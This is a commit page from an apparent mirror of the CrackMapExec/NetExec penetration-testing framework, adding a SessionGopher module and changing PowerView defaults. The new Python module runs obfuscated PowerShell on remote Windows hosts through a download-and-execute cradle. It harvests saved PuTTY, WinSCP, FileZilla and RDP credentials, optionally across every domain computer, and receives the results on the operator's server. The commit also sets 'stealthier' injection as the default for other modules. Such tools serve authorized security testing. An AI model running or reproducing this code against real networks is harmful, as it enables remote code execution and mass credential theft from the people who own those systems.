swisskyrepo
/
NetExec
mirror of https://github.com/swisskyrepo/NetExec.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added SessionGopher module

main
byt3bl33d3r 2017-05-07 23:19:04 -06:00
parent 4ff034f366
commit 2d22cca3ab
7 changed files with 102 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.gitmodules vendored
View File

@ -25,3 +25,6 @@
[submodule "cme/data/cme_powershell_scripts"]
path = cme/data/cme_powershell_scripts
url = https://github.com/byt3bl33d3r/CME-PowerShell-Scripts
[submodule "cme/data/sessiongopher"]
path = cme/data/sessiongopher
url = https://github.com/fireeye/SessionGopher

16
cme/crackmapexec.py
View File

@ -121,23 +121,23 @@ def main():
if args.list_modules:
modules = loader.get_modules()
for m in modules:
logger.info('{:<25} {}'.format(m, modules[m]['description']))
for name, props in sorted(modules.items()):
logger.info('{:<25} {}'.format(name, props['description']))
sys.exit(0)
elif args.module and args.show_module_options:
modules = loader.get_modules()
for m in modules.keys():
if args.module.lower() == m.lower():
logger.info('{} module options:\n{}'.format(m, modules[m]['options']))
for name, props in modules.items():
if args.module.lower() == name.lower():
logger.info('{} module options:\n{}'.format(name, props['options']))
sys.exit(0)
elif args.module:
modules = loader.get_modules()
for m in modules.keys():
if args.module.lower() == m.lower():
module = loader.init_module(modules[m]['path'])
for name, props in modules.items():
if args.module.lower() == name.lower():
module = loader.init_module(props['path'])
setattr(protocol_object, 'module', module)
break

2
cme/data/cme_powershell_scripts

@ -1 +1 @@
Subproject commit adbb4ff2c76b9281538c64fd44c2b594c6fd1f36
Subproject commit 0bbc10275554b4159ccd9cbb40c3d186babd20d1

1
cme/data/sessiongopher Submodule

@ -0,0 +1 @@
Subproject commit 2d6f713be7ae0384a55ce7e0ea994ce3b87a651c

4
cme/modules/get_netdomaincontroller.py
View File

@ -13,11 +13,11 @@ class CMEModule:
def options(self, context, module_options):
'''
INJECT If set to true, this allows PowerView to work over 'stealthier' execution methods which have non-interactive contexts (e.g. WMI) (default: false)
INJECT If set to true, this allows PowerView to work over 'stealthier' execution methods which have non-interactive contexts (e.g. WMI) (default: True)
'''
self.exec_methods = ['smbexec', 'atexec']
self.inject = False
self.inject = True
if 'INJECT' in module_options:
self.inject = bool(module_options['INJECT'])

4
cme/modules/get_netrdpsession.py
View File

@ -13,11 +13,11 @@ class CMEModule:
def options(self, context, module_options):
'''
INJECT If set to true, this allows PowerView to work over 'stealthier' execution methods which have non-interactive contexts (e.g. WMI) (default: false)
INJECT If set to true, this allows PowerView to work over 'stealthier' execution methods which have non-interactive contexts (e.g. WMI) (default: True)
'''
self.exec_methods = ['smbexec', 'atexec']
self.inject = False
self.inject = True
if 'INJECT' in module_options:
self.inject = bool(module_options['INJECT'])

85
cme/modules/invoke_sessiongopher.py Normal file
View File

@ -0,0 +1,85 @@
from cme.helpers.powershell import *
from cme.helpers.logger import write_log
from StringIO import StringIO
from datetime import datetime
class CMEModule:
'''
Digs up saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using SessionGopher
https://github.com/fireeye/SessionGopher
Module by @byt3bl33d3r
'''
name = 'invoke_sessiongopher'
description = 'Digs up saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using SessionGopher'
supported_protocols = ['smb', 'mssql']
opsec_safe= True
multiple_hosts = True
def options(self, context, module_options):
'''
THOROUGH Searches entire filesystem for certain file extensions (default: False)
ALLDOMAIN Queries Active Direcotry for a list of all domain-joined computers and runs SessionGopher against all of them (default: False)
'''
self.thorough = False
self.all_domain = False
if 'THOROUGH' in module_options:
self.thorough = bool(module_options['THOROUGH'])
if 'ALLDOMAIN' in module_options:
self.all_domain = bool(module_options['ALLDOMAIN'])
self.ps_script2 = obfs_ps_script('sessiongopher/SessionGopher.ps1')
def on_admin_login(self, context, connection):
command = 'Invoke-SessionGopher'
if self.thorough:
command += ' -Thorough'
if self.all_domain:
command += ' -AllDomain'
command += ' | Out-String'
launcher = gen_ps_iex_cradle(context, 'SessionGopher.ps1', command)
ps_command = create_ps_command(launcher)
connection.execute(ps_command)
context.log.success('Executed launcher')
def on_request(self, context, request):
if 'SessionGopher.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script2)
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.getheader('content-length'))
data = response.rfile.read(length)
#We've received the response, stop tracking this host
response.stop_tracking_host()
if len(data):
def print_post_data(data):
buf = StringIO(data.strip()).readlines()
for line in buf:
context.log.highlight(line.strip())
print_post_data(data)
log_name = 'SessionGopher-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.info("Saved output to {}".format(log_name))